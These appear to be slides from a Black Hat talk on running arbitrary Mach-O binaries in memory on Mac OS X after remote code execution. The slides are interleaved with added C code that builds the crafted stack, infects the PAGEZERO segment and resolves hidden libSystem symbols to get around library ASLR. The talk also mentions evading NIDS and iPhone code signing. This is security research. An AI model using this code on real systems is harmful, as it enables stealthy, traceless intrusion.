Who am I?

Student at Politecnico di Milano.

Security Consultant at Secure Network srl.

Reverse Engineer at Zynamics GmbH.

Goal of the talk

In-memory execution of arbitrary binaries on a Mac OS X machine.

Mach-O file

Header structure: information on the target architecture and options to interpret the file.

Load commands: symbol table location, initial register state.

Segments: define regions of the virtual memory and contain sections with code or data.

Segment and Sections

[Figure: one segment and one of its sections, with the values shown on the slide]

Segment: virtual address 0x1000, virtual memory size 0x1000, file offset 0x0, file size 0x1000.
Section: virtual address 0x1d54, virtual memory size 0x275, file offset 0xd54.

Black Hat Briefings 



Important segments

PAGEZERO: if a piece of code accesses NULL it lands here; the segment has no protection flags (no access at all, so the dereference faults).

TEXT: holds code and read-only data. RX protection.

DATA: holds data. RW protection.

LINKEDIT: holds information for the dynamic linker, including the symbol and string tables. RW protection.

Mach-O representation

[Figure: file layout, top to bottom: Header; Load commands; Segment command 1; Section 1 data; Section 2 data]

Binary execution

Conducted by the kernel and the dynamic linker.

The kernel, when it finishes its part, jumps to the dynamic linker entry point.

The dynamic linker is not randomized.

Execution steps

Kernel:
• Maps the dynamic linker in the process address space.
• Parses the header structure and loads all segments.
• Creates a new stack.

Dynamic linker:
• Retrieves the base address of the binary.
• Resolves symbols.
• Resolves library dependencies.
• Jumps to the binary entry point.

Stack

The stack built by the kernel holds:
• Mach-O file base address.
• Command line arguments.
• Environment variables.
• Execution path.
All padded.

Stack representation

[Figure: initial stack, from the initial stack pointer (lowest address) upward]
• Mach-O address
• argc
• argv[] (pointers)
• envp[] (pointers)
• exec_path pointer
• exec_path string
• argv[] strings
• envp[] strings

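As an added example (not code from the talk or from MachoFly), here is how the crafted stack described on the two slides above can be built in C on any platform, so that it can be shipped inside the injected binary and later mapped by the auto-loader. The argv/envp values, the exec path and the mapping addresses are constructed sample data; the NULL terminators after argv[], envp[] and the exec_path pointer, and the 16-byte padding, are assumptions matching XNU's i386 ABI rather than details stated on the slides.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not MachoFly's own code: lay out the "crafted stack" as the
 * slide shows it, from the initial stack pointer upward: Mach-O base address,
 * argc, argv[], envp[], exec_path pointer, then the exec_path, argv and envp
 * strings.  Assumptions not on the slides: argv[], envp[] and the exec_path
 * slot are NULL-terminated and both areas are 16-byte aligned (XNU i386 ABI).
 * Pointers are virtual addresses valid once the buffer is mapped at `stack_va`. */

struct crafted_stack {
    size_t   sp_off;    /* offset of the initial stack pointer inside the buffer */
    size_t   str_off;   /* offset where the string area starts */
    uint32_t argc;
};

static size_t count_vec(const char *const *v)
{
    size_t n = 0;
    while (v && v[n]) n++;
    return n;
}

/* Copy one NUL-terminated string into the string area and return its VA. */
static uint32_t put_str(uint8_t *buf, uint32_t stack_va, size_t *pos, const char *s)
{
    size_t n = strlen(s) + 1;
    memcpy(buf + *pos, s, n);
    uint32_t va = stack_va + (uint32_t)*pos;
    *pos += n;
    return va;
}

/* Returns 0 on success, -1 if `size` bytes are not enough. */
int build_crafted_stack(uint8_t *buf, size_t size, uint32_t stack_va, uint32_t macho_va,
                        const char *exec_path, const char *const *argv,
                        const char *const *envp, struct crafted_stack *out)
{
    size_t nargv = count_vec(argv), nenvp = count_vec(envp);

    /* bytes of strings: exec_path, every argv[i], every envp[i], each NUL-terminated */
    size_t str_bytes = strlen(exec_path) + 1;
    for (size_t i = 0; i < nargv; i++) str_bytes += strlen(argv[i]) + 1;
    for (size_t i = 0; i < nenvp; i++) str_bytes += strlen(envp[i]) + 1;

    /* pointer area: macho_va, argc, argv+NULL, envp+NULL, exec_path ptr+NULL */
    size_t ptr_bytes = (2 + nargv + 1 + nenvp + 1 + 2) * sizeof(uint32_t);

    if (str_bytes > size) return -1;
    size_t str_off = (size - str_bytes) & ~(size_t)15;   /* strings at the top, aligned down */
    if (str_off < ptr_bytes) return -1;
    size_t sp_off = (str_off - ptr_bytes) & ~(size_t)15; /* pointer area below it, padded */

    memset(buf, 0, size);                       /* padding and terminating NULLs are zero */
    uint32_t *p = (uint32_t *)(buf + sp_off);
    size_t pos = str_off;

    p[0] = macho_va;                            /* dyld reads the Mach-O base from here */
    p[1] = (uint32_t)nargv;                     /* argc */
    uint32_t exec_va = put_str(buf, stack_va, &pos, exec_path);   /* exec_path string first */
    uint32_t *argv_p = p + 2;
    for (size_t i = 0; i < nargv; i++) argv_p[i] = put_str(buf, stack_va, &pos, argv[i]);
    uint32_t *envp_p = argv_p + nargv + 1;      /* argv_p[nargv] stays NULL */
    for (size_t i = 0; i < nenvp; i++) envp_p[i] = put_str(buf, stack_va, &pos, envp[i]);
    envp_p[nenvp + 1] = exec_va;                /* envp_p[nenvp] is NULL, then exec_path ptr, then NULL */

    out->sp_off = sp_off;
    out->str_off = str_off;
    out->argc = (uint32_t)nargv;
    return 0;
}

/* Constructed sample: a crafted stack for running nmap inside the victim. */
#define SAMPLE_STACK_VA 0xbfffe000u   /* assumed address the auto-loader maps the stack at */
#define SAMPLE_MACHO_VA 0x00001000u   /* assumed base address of the injected Mach-O */
static uint32_t g_stack_storage[0x1000 / 4];   /* one page, 4-byte aligned */
static struct crafted_stack g_cs;

int build_sample_stack(void)
{
    static const char *const argv[] = { "nmap", "-sS", NULL };
    static const char *const envp[] = { "PATH=/usr/bin", NULL };
    return build_crafted_stack((uint8_t *)g_stack_storage, sizeof g_stack_storage,
                               SAMPLE_STACK_VA, SAMPLE_MACHO_VA, "/usr/local/bin/nmap",
                               argv, envp, &g_cs);
}

/* i-th 32-bit word above the initial stack pointer of the sample stack */
uint32_t sample_stack_word(size_t i) { return g_stack_storage[g_cs.sp_off / 4 + i]; }

/* translate a VA inside the sample stack back to the string it points to */
const char *sample_stack_string(uint32_t va)
{
    return (const char *)g_stack_storage + (va - SAMPLE_STACK_VA);
}

size_t sample_sp_offset(void) { return g_cs.sp_off; }

int main(void)
{
    if (build_sample_stack() != 0) return 1;
    /* word 7 is the exec_path pointer: 2 + argc + NULL + 1 envp + NULL */
    printf("sp at +0x%zx: macho=0x%x argc=%u argv[0]=%s exec_path=%s\n",
           g_cs.sp_off, sample_stack_word(0), sample_stack_word(1),
           sample_stack_string(sample_stack_word(2)), sample_stack_string(sample_stack_word(7)));
    return 0;
}
```

The auto-loader only has to map the buffer at the address it was built for and set the stack pointer to `sp_off` before jumping to the dynamic linker; every pointer inside is already absolute.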
Proposed attack

Userland-exec attack.

Encapsulate a shellcode, aka auto-loader, and a crafted stack in the injected binary.

Execute the auto-loader in the address space of the attacked process.

Who: an attacker with a remote code execution in his pocket.

Where: the attack is two-staged. First run a shellcode to receive the binary, then run the auto-loader contained in the binary.

Why: later in this talk.

What kind of binaries?

Any Mach-O file, from ls to Safari.

A nice picture

[Figure: exchange between Attacker and Victim]
(1) Attacker -> Victim: exploit code + MachoFly payload (Victim: "MachoFly loader ready")
(2) Attacker -> Victim: MachoFly auto-loader + arbitrary Mach-O
(3) Victim -> Attacker: arbitrary Mach-O response/output

Infected binary

We need to find a place to store the auto-loader and the crafted stack.

PAGEZERO infection technique.

Cavity infector technique.

PAGEZERO infection

• Change the _PAGEZERO protection flags to a custom value.
• Store the crafted stack and the auto-loader code at the end of the binary.
• Point _PAGEZERO to the crafted stack.
• Overwrite the first bytes of the file with the auto-loader address.

Binary layout

[Figure: infected file, top to bottom]
• MODIFIED HEADER
• INFECTED _PAGEZERO
• load commands and segments
• sections and binary data
• SHELLCODE (auto-loader)
• CRAFTED STACK

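The following C program is an added example, not MachoFly's own code: it applies the four PAGEZERO-infection steps above to a 32-bit Mach-O image held in memory, using the header and load-command walk that the Mach-O file slides describe. The structure definitions mirror Apple's <mach-o/loader.h> so the code also builds off a Mac; the sample image, the auto-loader bytes and the crafted-stack bytes are constructed placeholders, and the "auto-loader address" written over the first bytes is assumed to be a file offset that the first-stage shellcode adds to its receive buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not MachoFly's code.  32-bit mirrors of <mach-o/loader.h>;
 * the sample image, "auto-loader" and "crafted stack" bytes are placeholders.
 * Assumption: the auto-loader location stored in the first bytes is a file
 * offset relative to the start of the received image. */
#define MH_MAGIC        0xfeedface
#define MH_EXECUTE      2
#define LC_SEGMENT      1
#define VM_PROT_READ    1
#define VM_PROT_WRITE   2
#define VM_PROT_EXECUTE 4

struct mach_header  { uint32_t magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags; };
struct load_command { uint32_t cmd, cmdsize; };
struct segment_command {
    uint32_t cmd, cmdsize;
    char     segname[16];
    uint32_t vmaddr, vmsize, fileoff, filesize;
    int32_t  maxprot, initprot;
    uint32_t nsects, flags;
};

/* Walk the load commands of `img` (bounds-checked) and return the LC_SEGMENT named `name`. */
struct segment_command *find_segment(uint8_t *img, size_t len, const char *name)
{
    struct mach_header *mh = (struct mach_header *)img;
    if (len < sizeof *mh || sizeof *mh + mh->sizeofcmds > len) return NULL;
    uint8_t *p = img + sizeof *mh, *end = p + mh->sizeofcmds;
    for (uint32_t i = 0; i < mh->ncmds; i++) {
        struct load_command *lc = (struct load_command *)p;
        if (p + sizeof *lc > end || lc->cmdsize < sizeof *lc || p + lc->cmdsize > end) return NULL;
        if (lc->cmd == LC_SEGMENT && lc->cmdsize >= sizeof(struct segment_command)) {
            struct segment_command *sc = (struct segment_command *)lc;
            if (strncmp(sc->segname, name, sizeof sc->segname) == 0) return sc;
        }
        p += lc->cmdsize;
    }
    return NULL;
}

/* The four slide steps.  Returns a malloc'd infected image (caller frees) or NULL. */
uint8_t *infect_pagezero(const uint8_t *in, size_t in_len,
                         const uint8_t *loader, size_t loader_len,
                         const uint8_t *stack, size_t stack_len,
                         int32_t pagezero_prot, size_t *out_len)
{
    if (in_len < sizeof(struct mach_header) || ((const struct mach_header *)in)->magic != MH_MAGIC)
        return NULL;                                     /* 32-bit little-endian Mach-O only */
    size_t loader_off = in_len, stack_off = in_len + loader_len, total = stack_off + stack_len;
    uint8_t *out = malloc(total);
    if (!out) return NULL;
    memcpy(out, in, in_len);                             /* original file, then ... */
    memcpy(out + loader_off, loader, loader_len);        /* ... the auto-loader, then ... */
    memcpy(out + stack_off, stack, stack_len);           /* ... the crafted stack (step 2) */

    struct segment_command *pz = find_segment(out, in_len, "__PAGEZERO");
    if (!pz) { free(out); return NULL; }
    pz->maxprot = pz->initprot = pagezero_prot;          /* step 1: custom protection value */
    pz->fileoff  = (uint32_t)stack_off;                  /* step 3: _PAGEZERO -> crafted stack */
    pz->filesize = (uint32_t)stack_len;

    uint32_t where = (uint32_t)loader_off;               /* step 4: clobber the first bytes (the */
    memcpy(out, &where, sizeof where);                   /* magic) with the auto-loader location */
    *out_len = total;
    return out;
}

/* Constructed sample: header plus __PAGEZERO and __TEXT segment commands, no real code. */
static uint32_t g_sample[64];                            /* 256 bytes, 4-byte aligned */
size_t make_sample_macho(void)
{
    uint8_t *img = (uint8_t *)g_sample;
    memset(img, 0, sizeof g_sample);
    struct mach_header *mh = (struct mach_header *)img;
    mh->magic = MH_MAGIC; mh->cputype = 7 /* CPU_TYPE_I386 */; mh->filetype = MH_EXECUTE;
    mh->ncmds = 2; mh->sizeofcmds = 2 * sizeof(struct segment_command);
    struct segment_command *pz = (struct segment_command *)(img + sizeof *mh);
    pz->cmd = LC_SEGMENT; pz->cmdsize = sizeof *pz; strcpy(pz->segname, "__PAGEZERO");
    pz->vmsize = 0x1000;                                 /* vmaddr 0, no file bytes, no access */
    struct segment_command *tx = pz + 1;
    tx->cmd = LC_SEGMENT; tx->cmdsize = sizeof *tx; strcpy(tx->segname, "__TEXT");
    tx->vmaddr = 0x1000; tx->vmsize = 0x1000; tx->filesize = sizeof g_sample;
    tx->maxprot = tx->initprot = VM_PROT_READ | VM_PROT_EXECUTE;
    return sizeof g_sample;
}

static uint8_t *g_out; static size_t g_out_len;
static const uint8_t g_loader[] = { 0xcc, 0xcc, 0xcc, 0xcc };            /* placeholder auto-loader */
static const uint8_t g_stack[]  = { 0x00, 0x10, 0x00, 0x00, 0x01, 0, 0, 0 }; /* placeholder stack */

int demo_infect(void)
{
    size_t len = make_sample_macho();
    free(g_out);
    g_out = infect_pagezero((uint8_t *)g_sample, len, g_loader, sizeof g_loader,
                            g_stack, sizeof g_stack, VM_PROT_READ | VM_PROT_WRITE, &g_out_len);
    return g_out ? 0 : -1;
}
uint8_t *infected_image(void) { return g_out; }
size_t   infected_len(void) { return g_out_len; }
uint32_t infected_first_word(void) { uint32_t w; memcpy(&w, g_out, sizeof w); return w; }
const struct segment_command *infected_pagezero(void) { return find_segment(g_out, g_out_len, "__PAGEZERO"); }

int main(void)
{
    if (demo_infect() != 0) { puts("infection failed"); return 1; }
    const struct segment_command *pz = infected_pagezero();
    printf("auto-loader at file offset 0x%x, _PAGEZERO -> stack at 0x%x (%u bytes), prot %d\n",
           infected_first_word(), pz->fileoff, pz->filesize, pz->initprot);
    return 0;
}
```

Note that step 4 destroys the magic, so the kernel would refuse to execve() the infected file; that is irrelevant here, because the file is only ever parsed by the auto-loader in memory, and the auto-loader must not rely on the magic itself.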
Auto-loader

Impersonates the kernel.
Un-maps the old binary.
Maps the new one.

Auto-loader description

• Parses the binary.
• Reads the virtual addresses of the injected binary's segments.
• Unloads the attacked binary's segments pointed to by those virtual addresses.
• Loads the injected binary's segments.

Auto-loader description (2)

• Maps the crafted stack referenced by _PAGEZERO.
• Cleans registers.
• Cleans some libSystem variables.
• Jumps to the dynamic linker entry point.

We do like pictures, don't we?

[Figure: victim's process address space, showing the segments TEXT, DATA, LINKEDIT, ..., SEGMENT-N]

libSystem variables

• _malloc_def_zone_state
• _NXArgv_pointer
• _malloc_num_zones
• keymgr_global

Why are those variables important?

They are used in the initialization of malloc.

Two of them are used for command line argument parsing.

Not cleaning them will result in a crash.

Hunting the variables

Mac OS X Leopard has ASLR for libraries.

Those variables are not exported.

Cannot use the dlopen()/dlsym() combo.

• Mach-O file structure
• XNU binary execution
• Attack technique
• Defeat ASLR on libraries to enhance the attack

Defeat ASLR

• Retrieve the libSystem in-memory base address.
• Read symbols from the libSystem binary.
• Adjust symbols to the new address.

How ASLR works in Leopard

Only libraries are randomized.

The randomization is performed whenever the system or the libraries are updated.

Library segment addresses are saved in dyld_shared_cache_arch.map.

Retrieve libSystem address

• Parse dyld_shared_cache_i386.map and search for the libSystem entry.

• Adopt functions exported by the dynamic linker and perform the whole task in-memory.

Dyld functions

• _dyld_image_count(): used to retrieve the number of linked libraries of a process.

• _dyld_get_image_header(): used to retrieve the base address of each library.

• _dyld_get_image_name(): used to retrieve the name of a given library.

Find 'em

• Parse the dyld load commands.
• Retrieve the LINKEDIT address.
• Iterate the dyld symbol table and search for the function names in LINKEDIT.

Back to libSystem

Non-exported symbols are taken out of the symbol table when the library is loaded.

Open the libSystem binary and find the variables in its symbol table.

Adjust the variables to the base address of the in-memory DATA segment.

Put pieces together

Iterate the header structure of libSystem in-memory and find the DATA base address.

• DATA base address in the file: 0x2000
• Symbol in the file at 0x2054
• In-memory DATA base address: 0x4000
• Symbol in-memory at 0x4054 (0x4000 + (0x2054 - 0x2000))

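This added C example (not MachoFly's code) covers the symbol hunting of the last three slides: the name lookup over an LC_SYMTAB that "Find 'em" performs against the dyld exports, run here against a libSystem-like image, followed by the DATA-relative adjustment of "Put pieces together". The image is constructed in memory with a __DATA segment at 0x2000 and `_malloc_num_zones` at 0x2054, the slide's numbers; the exported `_malloc_create_zone` entry and its address 0x1800 are illustrative only, and the flat structure definitions mirror <mach-o/loader.h> and <mach-o/nlist.h> so the code builds off a Mac.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not MachoFly's code.  Symbol lookup by name in a Mach-O symbol
 * table, plus the in-memory rebase of a non-exported libSystem variable.
 * 32-bit mirrors of <mach-o/loader.h> / <mach-o/nlist.h>; the sample image is
 * constructed (__DATA at 0x2000, _malloc_num_zones at 0x2054 as on the slide,
 * the exported _malloc_create_zone at 0x1800 is illustrative). */
#define MH_MAGIC   0xfeedface
#define MH_DYLIB   6
#define LC_SEGMENT 1
#define LC_SYMTAB  2
#define N_STAB     0xe0
#define N_TYPE     0x0e
#define N_SECT     0x0e
#define N_EXT      0x01

struct mach_header  { uint32_t magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags; };
struct load_command { uint32_t cmd, cmdsize; };
struct segment_command {
    uint32_t cmd, cmdsize; char segname[16];
    uint32_t vmaddr, vmsize, fileoff, filesize;
    int32_t  maxprot, initprot; uint32_t nsects, flags;
};
struct symtab_command { uint32_t cmd, cmdsize, symoff, nsyms, stroff, strsize; };
struct nlist { uint32_t n_strx; uint8_t n_type; uint8_t n_sect; int16_t n_desc; uint32_t n_value; };

/* Bounds-checked load-command iterator: pass NULL for the first, the previous for the next. */
static const struct load_command *next_cmd(const uint8_t *img, size_t len, const struct load_command *prev)
{
    const struct mach_header *mh = (const struct mach_header *)img;
    if (len < sizeof *mh || sizeof *mh + mh->sizeofcmds > len) return NULL;
    const uint8_t *end = img + sizeof *mh + mh->sizeofcmds;
    const uint8_t *p = prev ? (const uint8_t *)prev + prev->cmdsize : img + sizeof *mh;
    if (p + sizeof(struct load_command) > end) return NULL;
    const struct load_command *lc = (const struct load_command *)p;
    if (lc->cmdsize < sizeof *lc || p + lc->cmdsize > end) return NULL;
    return lc;
}

/* Find `name` among the defined (N_SECT) symbols, exported or not. */
const struct nlist *find_symbol(const uint8_t *img, size_t len, const char *name)
{
    const struct symtab_command *st = NULL;
    for (const struct load_command *lc = next_cmd(img, len, NULL); lc; lc = next_cmd(img, len, lc))
        if (lc->cmd == LC_SYMTAB && lc->cmdsize >= sizeof *st) { st = (const struct symtab_command *)lc; break; }
    if (!st) return NULL;
    if ((uint64_t)st->symoff + (uint64_t)st->nsyms * sizeof(struct nlist) > len ||
        (uint64_t)st->stroff + st->strsize > len)
        return NULL;                                    /* both tables must lie inside the image */
    const struct nlist *syms = (const struct nlist *)(img + st->symoff);
    const char *strtab = (const char *)(img + st->stroff);
    for (uint32_t i = 0; i < st->nsyms; i++) {
        const struct nlist *s = &syms[i];
        if ((s->n_type & N_STAB) || (s->n_type & N_TYPE) != N_SECT) continue;  /* debug/undefined */
        if (s->n_strx >= st->strsize) continue;
        const char *sname = strtab + s->n_strx;
        if (!memchr(sname, 0, st->strsize - s->n_strx)) continue;      /* unterminated name */
        if (strcmp(sname, name) == 0) return s;
    }
    return NULL;
}

int symbol_is_exported(const struct nlist *s) { return (s->n_type & N_EXT) != 0; }

/* The LC_SEGMENT whose [vmaddr, vmaddr + vmsize) contains `addr`. */
const struct segment_command *segment_for_addr(const uint8_t *img, size_t len, uint32_t addr)
{
    for (const struct load_command *lc = next_cmd(img, len, NULL); lc; lc = next_cmd(img, len, lc)) {
        if (lc->cmd != LC_SEGMENT || lc->cmdsize < sizeof(struct segment_command)) continue;
        const struct segment_command *sc = (const struct segment_command *)lc;
        if (addr >= sc->vmaddr && addr - sc->vmaddr < sc->vmsize) return sc;
    }
    return NULL;
}

/* Address of `name` once its segment sits at `inmem_seg_base`, the base the
 * auto-loader finds by walking the library's header inside the victim process. */
int resolve_slid_symbol(const uint8_t *file_img, size_t len, const char *name,
                        uint32_t inmem_seg_base, uint32_t *out)
{
    const struct nlist *sym = find_symbol(file_img, len, name);
    if (!sym) return -1;
    const struct segment_command *seg = segment_for_addr(file_img, len, sym->n_value);
    if (!seg) return -1;
    *out = inmem_seg_base + (sym->n_value - seg->vmaddr);   /* 0x4000 + (0x2054 - 0x2000) */
    return 0;
}

/* Constructed libSystem-like image: __TEXT, __DATA, LC_SYMTAB with two symbols. */
static uint32_t g_img[128];
size_t make_sample_library(void)
{
    uint8_t *img = (uint8_t *)g_img;
    memset(img, 0, sizeof g_img);
    struct mach_header *mh = (struct mach_header *)img;
    mh->magic = MH_MAGIC; mh->cputype = 7; mh->filetype = MH_DYLIB; mh->ncmds = 3;
    mh->sizeofcmds = 2 * sizeof(struct segment_command) + sizeof(struct symtab_command);
    struct segment_command *text = (struct segment_command *)(img + sizeof *mh);
    text->cmd = LC_SEGMENT; text->cmdsize = sizeof *text; strcpy(text->segname, "__TEXT");
    text->vmaddr = 0x1000; text->vmsize = 0x1000; text->maxprot = text->initprot = 5;
    struct segment_command *data = text + 1;
    data->cmd = LC_SEGMENT; data->cmdsize = sizeof *data; strcpy(data->segname, "__DATA");
    data->vmaddr = 0x2000; data->vmsize = 0x1000; data->maxprot = data->initprot = 3;
    struct symtab_command *st = (struct symtab_command *)(data + 1);
    static const char strtab[] = "\0_malloc_num_zones\0_malloc_create_zone";
    st->cmd = LC_SYMTAB; st->cmdsize = sizeof *st;
    st->symoff = 256; st->nsyms = 2; st->stroff = 256 + 2 * sizeof(struct nlist); st->strsize = sizeof strtab;
    struct nlist *syms = (struct nlist *)(img + st->symoff);
    syms[0].n_strx = 1;  syms[0].n_type = N_SECT;         syms[0].n_sect = 2; syms[0].n_value = 0x2054; /* private */
    syms[1].n_strx = 19; syms[1].n_type = N_SECT | N_EXT; syms[1].n_sect = 1; syms[1].n_value = 0x1800; /* exported */
    memcpy(img + st->stroff, strtab, sizeof strtab);
    return sizeof g_img;
}

uint32_t demo_slide(const char *name, uint32_t inmem_seg_base)
{
    size_t len = make_sample_library();
    uint32_t addr = 0;
    return resolve_slid_symbol((uint8_t *)g_img, len, name, inmem_seg_base, &addr) == 0 ? addr : 0;
}

int demo_exported(const char *name)
{
    size_t len = make_sample_library();
    const struct nlist *s = find_symbol((uint8_t *)g_img, len, name);
    return s ? symbol_is_exported(s) : -1;
}

int main(void)
{
    printf("_malloc_num_zones exported: %d, in-memory with DATA at 0x4000: 0x%x\n",
           demo_exported("_malloc_num_zones"), demo_slide("_malloc_num_zones", 0x4000));
    return 0;
}
```

The same `find_symbol` serves both halves of the technique: run over the in-memory dyld image it yields the exported `_dyld_*` functions directly, while for libSystem it must be run over the on-disk file (where the private symbols still exist) and the result slid with `resolve_slid_symbol` using the DATA base found in the victim.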
Results

• Run a binary on an arbitrary machine.
• No traces on the hard-disk.
• No execve(): the kernel doesn't know about us.
• It works with every binary.
• It is possible to write payloads in a high level language.

Demo description

Run a simple piece of code which acts like a shellcode and retrieves the binary.

Execute the attack with nmap and Safari.

Show the network dump.

Show the memory layout before and after the attack.

DEMO

Future developments

• Employ encryption to avoid NIDS detection.
• Use the cavity infector technique.
• Port the code to iPhone to evade code signing protection (catch you at BH Europe).

Thanks, questions?